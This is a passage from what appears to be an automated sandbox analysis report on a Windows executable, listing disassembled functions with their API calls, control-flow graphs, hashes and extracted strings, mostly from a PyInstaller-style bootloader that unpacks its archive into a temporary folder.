                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A416521A0C54285EB61BB64E8441BAA362FFA87A4FD00631DB9D43AD4DF3CD549CF50
                                                                                                                                                                                                                                  Function 00007FF72C659280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                                                  • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                  • Instruction ID: 99c73fc6a28612792b6c6d8362d0e314c348d17b3c172c1cdf7a5882f38cef59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6F0C822A1C74286F7619B60B889776B351FB94378F940735DA6D02AD4DF3CD059CE00
                                                                                                                                                                                                                                  Function 00007FF72C651950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 331 7ff72c651950-7ff72c65198b call 7ff72c6545c0 334 7ff72c651c4e-7ff72c651c72 call 7ff72c65c550 331->334 335 7ff72c651991-7ff72c6519d1 call 7ff72c657f90 331->335 340 7ff72c651c3b-7ff72c651c3e call 7ff72c66004c 335->340 341 7ff72c6519d7-7ff72c6519e7 call 7ff72c6606d4 335->341 345 7ff72c651c43-7ff72c651c4b 340->345 346 7ff72c651a08-7ff72c651a24 call 7ff72c66039c 341->346 347 7ff72c6519e9-7ff72c651a03 call 7ff72c664f08 call 7ff72c652910 341->347 345->334 352 7ff72c651a45-7ff72c651a5a call 7ff72c664f28 346->352 353 7ff72c651a26-7ff72c651a40 call 7ff72c664f08 call 7ff72c652910 346->353 347->340 361 7ff72c651a7b-7ff72c651afc call 7ff72c651c80 * 2 call 7ff72c6606d4 352->361 362 7ff72c651a5c-7ff72c651a76 call 7ff72c664f08 call 7ff72c652910 352->362 353->340 373 7ff72c651b01-7ff72c651b14 call 7ff72c664f44 361->373 362->340 376 7ff72c651b35-7ff72c651b4e call 7ff72c66039c 373->376 377 7ff72c651b16-7ff72c651b30 call 7ff72c664f08 call 7ff72c652910 373->377 382 7ff72c651b6f-7ff72c651b8b call 7ff72c660110 376->382 383 7ff72c651b50-7ff72c651b6a call 7ff72c664f08 call 7ff72c652910 376->383 377->340 391 7ff72c651b8d-7ff72c651b99 call 7ff72c652710 382->391 392 7ff72c651b9e-7ff72c651bac 382->392 383->340 391->340 392->340 395 7ff72c651bb2-7ff72c651bb9 392->395 397 7ff72c651bc1-7ff72c651bc7 395->397 398 7ff72c651bc9-7ff72c651bd6 397->398 399 7ff72c651be0-7ff72c651bef 397->399 400 7ff72c651bf1-7ff72c651bfa 398->400 399->399 399->400 401 7ff72c651bfc-7ff72c651bff 400->401 402 7ff72c651c0f 400->402 401->402 403 7ff72c651c01-7ff72c651c04 401->403 404 7ff72c651c11-7ff72c651c24 402->404 403->402 405 7ff72c651c06-7ff72c651c09 403->405 406 7ff72c651c2d-7ff72c651c39 404->406 407 7ff72c651c26 404->407 405->402 408 7ff72c651c0b-7ff72c651c0d 405->408 406->340 406->397 407->406 408->404
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C657F90: _fread_nolock.LIBCMT ref: 00007FF72C65803A
                                                                                                                                                                                                                                  • _fread_nolock.LIBCMT ref: 00007FF72C651A1B
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF72C651B6A), ref: 00007FF72C65295E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                  • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                  • Opcode ID: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
                                                                                                                                                                                                                                  • Instruction ID: 05d1e98607e00c0932de05aeb01288415088a65e3b3c311ea904c174ccc401cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75df882cb69919a76d97c614361eef51b2ec2ab8d5059f73c2ac4bb1c74e6529
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D981D671A0C68286EB22FB14DC412B9B3A2FFA47A4FE04435DA8D43785DE3CE5458F60
                                                                                                                                                                                                                                  Function 00007FF72C651600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 409 7ff72c651600-7ff72c651611 410 7ff72c651637-7ff72c651651 call 7ff72c6545c0 409->410 411 7ff72c651613-7ff72c65161c call 7ff72c651050 409->411 418 7ff72c651653-7ff72c651681 call 7ff72c664f08 call 7ff72c652910 410->418 419 7ff72c651682-7ff72c65169c call 7ff72c6545c0 410->419 416 7ff72c65162e-7ff72c651636 411->416 417 7ff72c65161e-7ff72c651629 call 7ff72c652710 411->417 417->416 426 7ff72c65169e-7ff72c6516b3 call 7ff72c652710 419->426 427 7ff72c6516b8-7ff72c6516cf call 7ff72c6606d4 419->427 433 7ff72c651821-7ff72c651824 call 7ff72c66004c 426->433 434 7ff72c6516f9-7ff72c6516fd 427->434 435 7ff72c6516d1-7ff72c6516f4 call 7ff72c664f08 call 7ff72c652910 427->435 442 7ff72c651829-7ff72c65183b 433->442 436 7ff72c651717-7ff72c651737 call 7ff72c664f44 434->436 437 7ff72c6516ff-7ff72c65170b call 7ff72c651210 434->437 448 7ff72c651819-7ff72c65181c call 7ff72c66004c 435->448 449 7ff72c651739-7ff72c65175c call 7ff72c664f08 call 7ff72c652910 436->449 450 7ff72c651761-7ff72c65176c 436->450 445 7ff72c651710-7ff72c651712 437->445 445->448 448->433 462 7ff72c65180f-7ff72c651814 449->462 453 7ff72c651802-7ff72c65180a call 7ff72c664f30 450->453 454 7ff72c651772-7ff72c651777 450->454 453->462 455 7ff72c651780-7ff72c6517a2 call 7ff72c66039c 454->455 464 7ff72c6517da-7ff72c6517e6 call 7ff72c664f08 455->464 465 7ff72c6517a4-7ff72c6517bc call 7ff72c660adc 455->465 462->448 472 7ff72c6517ed-7ff72c6517f8 call 7ff72c652910 464->472 470 7ff72c6517be-7ff72c6517c1 465->470 471 7ff72c6517c5-7ff72c6517d8 call 7ff72c664f08 465->471 470->455 473 7ff72c6517c3 470->473 471->472 477 7ff72c6517fd 472->477 473->477 477->453
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                  • Opcode ID: d7e5a8d788c56064f5ee056adac7b7af7416d0cf868ad80b96a324f46d3978b4
                                                                                                                                                                                                                                  • Instruction ID: 7a8256f425ef56693fea974cd6de1fa983b96e23732f8caa7f317c581f33775f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7e5a8d788c56064f5ee056adac7b7af7416d0cf868ad80b96a324f46d3978b4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02519061B0864392EA12BB119C111B9A3A2FFA07F4FE44535EE1C07BD6DE3CE5498F60
                                                                                                                                                                                                                                  Function 00007FF72C658660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,00000000,00007FF72C653CBB), ref: 00007FF72C658704
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,00007FF72C653CBB), ref: 00007FF72C65870A
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00007FF72C653CBB), ref: 00007FF72C65874C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658830: GetEnvironmentVariableW.KERNEL32(00007FF72C65388E), ref: 00007FF72C658867
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C658830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72C658889
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C668238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72C668251
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652810: MessageBoxW.USER32 ref: 00007FF72C6528EA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                  • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                  • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                  • Instruction ID: ccd400955c279738c84ebd1a9837a2eb1e4600d8e859cc44b92fd759b3684798
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35419011A1964244EA13FB619C552B9A253FFA97E0FE00535EE0D47ADADE3CE805CF60
                                                                                                                                                                                                                                  Function 00007FF72C651210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 601 7ff72c651210-7ff72c65126d call 7ff72c65bd80 604 7ff72c651297-7ff72c6512af call 7ff72c664f44 601->604 605 7ff72c65126f-7ff72c651296 call 7ff72c652710 601->605 610 7ff72c6512d4-7ff72c6512e4 call 7ff72c664f44 604->610 611 7ff72c6512b1-7ff72c6512cf call 7ff72c664f08 call 7ff72c652910 604->611 616 7ff72c651309-7ff72c65131b 610->616 617 7ff72c6512e6-7ff72c651304 call 7ff72c664f08 call 7ff72c652910 610->617 624 7ff72c651439-7ff72c65144e call 7ff72c65ba60 call 7ff72c664f30 * 2 611->624 620 7ff72c651320-7ff72c651345 call 7ff72c66039c 616->620 617->624 630 7ff72c65134b-7ff72c651355 call 7ff72c660110 620->630 631 7ff72c651431 620->631 638 7ff72c651453-7ff72c65146d 624->638 630->631 637 7ff72c65135b-7ff72c651367 630->637 631->624 639 7ff72c651370-7ff72c651398 call 7ff72c65a1c0 637->639 642 7ff72c65139a-7ff72c65139d 639->642 643 7ff72c651416-7ff72c65142c call 7ff72c652710 639->643 644 7ff72c65139f-7ff72c6513a9 642->644 645 7ff72c651411 642->645 643->631 647 7ff72c6513ab-7ff72c6513b9 call 7ff72c660adc 644->647 648 7ff72c6513d4-7ff72c6513d7 644->648 645->643 652 7ff72c6513be-7ff72c6513c1 647->652 650 7ff72c6513d9-7ff72c6513e7 call 7ff72c679e30 648->650 651 7ff72c6513ea-7ff72c6513ef 648->651 650->651 651->639 654 7ff72c6513f5-7ff72c6513f8 651->654 657 7ff72c6513c3-7ff72c6513cd call 7ff72c660110 652->657 658 7ff72c6513cf-7ff72c6513d2 652->658 655 7ff72c65140c-7ff72c65140f 654->655 656 7ff72c6513fa-7ff72c6513fd 654->656 655->631 656->643 660 7ff72c6513ff-7ff72c651407 656->660 657->651 657->658 658->643 660->620
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                  • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                  • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                  • Instruction ID: d50ba084d5fe2f5b8fd5136801dc8979788115cb1ce4a556445b3f253009d73f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1651D522A0864245E622FB11AC503BAE292FFA47E4FE44535EF4E477D5EE3CE545CB10
                                                                                                                                                                                                                                  Function 00007FF72C66ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF72C66F0AA,?,?,-00000018,00007FF72C66AD53,?,?,?,00007FF72C66AC4A,?,?,?,00007FF72C665F3E), ref: 00007FF72C66EE8C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF72C66F0AA,?,?,-00000018,00007FF72C66AD53,?,?,?,00007FF72C66AC4A,?,?,?,00007FF72C665F3E), ref: 00007FF72C66EE98
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                  • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                  • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                  • Instruction ID: 4bc6771c35aad53dbe7e34b14185a0abb63c90f1c0af2297e5558ee2b09d60af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8841E62171964282EA17AB569C04575B2A2FF65BB0FE84539DD1D47784EE3CE40A8A20
                                                                                                                                                                                                                                  Function 00007FF72C6536B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00007FF72C653804), ref: 00007FF72C6536E1
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF72C653804), ref: 00007FF72C6536EB
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652C9E
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72C653706,?,00007FF72C653804), ref: 00007FF72C652D63
                                                                                                                                                                                                                                    • Part of subcall function 00007FF72C652C50: MessageBoxW.USER32 ref: 00007FF72C652D99
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960434501.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960550625.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960610323.00007FF72C692000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000005.00000002.1960713333.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                  • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                  • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                  • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                  • Instruction ID: a21fb4b08906b3152e570bc7fccf02248fe77c7fd2e6215aee0efc2c8f7c518f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C219461F18A4291FA22B720EC153B6A253FFA87B4FE40132D75D865D5EE2CE509CB24
                                                                                                                                                                                                                                  Function 00007FF72C66BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 746 7ff72c66ba5c-7ff72c66ba82 747 7ff72c66ba9d-7ff72c66baa1 746->747 748 7ff72c66ba84-7ff72c66ba98 call 7ff72c664ee8 call 7ff72c664f08 746->748 750 7ff72c66be77-7ff72c66be83 call 7ff72c664ee8 call 7ff72c664f08 747->750 751 7ff72c66baa7-7ff72c66baae 747->751 764 7ff72c66be8e 748->764 767 7ff72c66be89 call 7ff72c66a8e0 750->767 751->750 753 7ff72c66bab4-7ff72c66bae2 751->753 753->750 756 7ff72c66bae8-7ff72c66baef 753->756 759 7ff72c66bb08-7ff72c66bb0b 756->759 760 7ff72c66baf1-7ff72c66bb03 call 7ff72c664ee8 call 7ff72c664f08 756->760 762 7ff72c66be73-7ff72c66be75 759->762 763 7ff72c66bb11-7ff72c66bb17 759->763 760->767 768 7ff72c66be91-7ff72c66bea8 762->768 763->762 769 7ff72c66bb1d-7ff72c66bb20 763->769 764->768 767->764 769->760 773 7ff72c66bb22-7ff72c66bb47 769->773 775 7ff72c66bb49-7ff72c66bb4b 773->775 776 7ff72c66bb7a-7ff72c66bb81 773->776 779 7ff72c66bb4d-7ff72c66bb54 775->779 780 7ff72c66bb72-7ff72c66bb78 775->780 777 7ff72c66bb56-7ff72c66bb6d call 7ff72c664ee8 call 7ff72c664f08 call 7ff72c66a8e0 776->777 778 7ff72c66bb83-7ff72c66bbab call 7ff72c66d5fc call 7ff72c66a948 * 2 776->778 812 7ff72c66bd00 777->812 807 7ff72c66bbad-7ff72c66bbc3 call 7ff72c664f08 call 7ff72c664ee8 778->807 808 7ff72c66bbc8-7ff72c66bbf3 call 7ff72c66c284 778->808 779->777 779->780 781 7ff72c66bbf8-7ff72c66bc0f 780->781 784 7ff72c66bc8a-7ff72c66bc94 call 7ff72c67391c 781->784 785 7ff72c66bc11-7ff72c66bc19 781->785 798 7ff72c66bd1e 784->798 799 7ff72c66bc9a-7ff72c66bcaf 784->799 785->784 788 7ff72c66bc1b-7ff72c66bc1d 785->788 788->784 792 7ff72c66bc1f-7ff72c66bc35 788->792 792->784 796 7ff72c66bc37-7ff72c66bc43 792->796 796->784 801 7ff72c66bc45-7ff72c66bc47 796->801 803 7ff72c66bd23-7ff72c66bd43 ReadFile 798->803 799->798 804 7ff72c66bcb1-7ff72c66bcc3 GetConsoleMode 799->804 801->784 806 7ff72c66bc49-7ff72c66bc61 801->806 809 7ff72c66be3d-7ff72c66be46 GetLastError 803->809 810 7ff72c66bd49-7ff72c66bd51 803->810 804->798 811 7ff72c66bcc5-7ff72c66bccd 804->811 806->784 817 7ff72c66bc63-7ff72c66bc6f 806->817 807->812 808->781 814 7ff72c66be48-7ff72c66be5e call 7ff72c664f08 call 7ff72c664ee8 809->814 815 7ff72c66be63-7ff72c66be66 809->815 810->809 819 7ff72c66bd57 810->819 811->803 813 7ff72c66bccf-7ff72c66bcf1 ReadConsoleW 811->813 816 7ff72c66bd03-7ff72c66bd0d call 7ff72c66a948 812->816 821 7ff72c66bcf3 GetLastError 813->821 822 7ff72c66bd12-7ff72c66bd1c 813->822 814->812 826 7ff72c66be6c-7ff72c66be6e 815->826 827 7ff72c66bcf9-7ff72c66bcfb call 7ff72c664e7c 815->827 816->768 817->784 825 7ff72c66bc71-7ff72c66bc73 817->825 829 7ff72c66bd5e-7ff72c66bd73 819->829 821->827 822->829 825->784 834 7ff72c66bc75-7ff72c66bc85 825->834 826->816 827->812 829->816 836 7ff72c66bd75-7ff72c66bd80 829->836 834->784 839 7ff72c66bda7-7ff72c66bdaf 836->839 840 7ff72c66bd82-7ff72c66bd9b call 7ff72c66b674 836->840 842 7ff72c66be2b-7ff72c66be38 call 7ff72c66b4b4 839->842 843 7ff72c66bdb1-7ff72c66bdc3 839->843 846 7ff72c66bda0-7ff72c66bda2 840->846 842->846 847 7ff72c66be1e-7ff72c66be26 843->847 848 7ff72c66bdc5 843->848 846->816 847->816 850 7ff72c66bdca-7ff72c66bdd1 848->850 851 7ff72c66be0d-7ff72c66be18 850->851 852 7ff72c66bdd3-7ff72c66bdd7 850->852 851->847 853 7ff72c66bdd9-7ff72c66bde0 852->853 854 7ff72c66bdf3 852->854 853->854 855 7ff72c66bde2-7ff72c66bde6 853->855 856 7ff72c66bdf9-7ff72c66be09 854->856 855->854 857 7ff72c66bde8-7ff72c66bdf1 855->857 856->850 858 7ff72c66be0b 856->858 857->856 858->847
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1960476725.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
